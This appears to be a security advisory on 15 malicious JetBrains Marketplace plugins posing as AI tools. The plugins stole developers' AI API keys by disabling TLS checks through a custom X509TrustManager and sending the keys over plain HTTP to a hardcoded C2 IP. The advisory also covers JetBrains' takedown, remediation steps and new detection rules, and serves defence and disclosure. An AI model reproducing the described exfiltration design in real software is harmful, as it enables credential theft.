15 plugins on JetBrains Marketplace masqueraded as AI utilities while quietly stealing developer-configured AI provider API keys and shipping them in plaintext to a hardcoded C2 server at 39.107.60 51.
15 Plugins, One C2 Server: How the Exfiltration Worked The plugins had names like "DeepSeek Junit Test", "AI FindBugs", and "CodeGPT AI Assistant" - they offered text generation or unit testing. When a developer entered their OpenAI, DeepSeek, or SiliconFlow API key into the plugin settings and clicked "Apply", the plugin executed an unauthorized backend function. To keep the exfiltration quiet, the threat actors installed a JVM-wide X509TrustManager that disabled unsigned and self-signed TLS warnings. That prevented local IDE debuggers and network monitors from flagging the outbound connection. The validated key string then traveled as a plaintext JSON payload over unencrypted HTTP directly to 39.107.60 51. JetBrains noted that its Plugin Verifier tool historically checked compatibility and API usage, not data-flow or anti-malware behavior. Because the core APIs looked normal and the hardcoded IP and custom TLS config were not flagged during ingestion, these plugins slipped through.
JetBrains Cleaned House: Remote Kill and Publisher Bans On June 16, 2026, JetBrains received security reports. Within hours, all 15 plugins were purged from the Marketplace and blocked from future downloads. The 7 publisher accounts behind the campaign were permanently terminated. JetBrains triggered its remote kill-switch: all affected plugins were marked as broken in the backend, so on the next IDE relaunch they are disabled instantly. No internal JetBrains source code, development environments, or corporate infrastructure were compromised.
Your API Keys Are Toast: Immediate Steps Any token entered into these plugins must be treated as exposed. Go to your developer consoles at OpenAI, DeepSeek, SiliconFlow, or other providers and permanently revoke those secrets. Generate fresh keys with tight scopes - use model-specific tokens and spending caps, not root keys. Check your AI provider dashboards for spikes in API spend or unrecognized queries tied to the malicious IP. Corporate admins should block 39.107.60 51 at the firewall and in DNS blocklists. Also scan your repositories to ensure no active AI provider tokens were committed to version control. JetBrains is actively deploying new rule layers to its ingestion pipeline that flag raw IP endpoints, unauthorized TLS weakening (like custom X509TrustManager), and automation triggers for plugin handling of sensitive API keys. For future AI tool integrations, JetBrains recommends the Agent Client Protocol (ACP) - an open standard built with Zed that restricts plugin communication to structured inputs and outputs, reducing the attack surface. Revoke those keys now. Block that IP. The next campaign will try something different.
Source: JetBrains Marketplace Ecosystem Security Update: Addressing Malicious Third-Party AI Plugins
Domain: blog.jetbrains.com
Comments load interactively on the live page.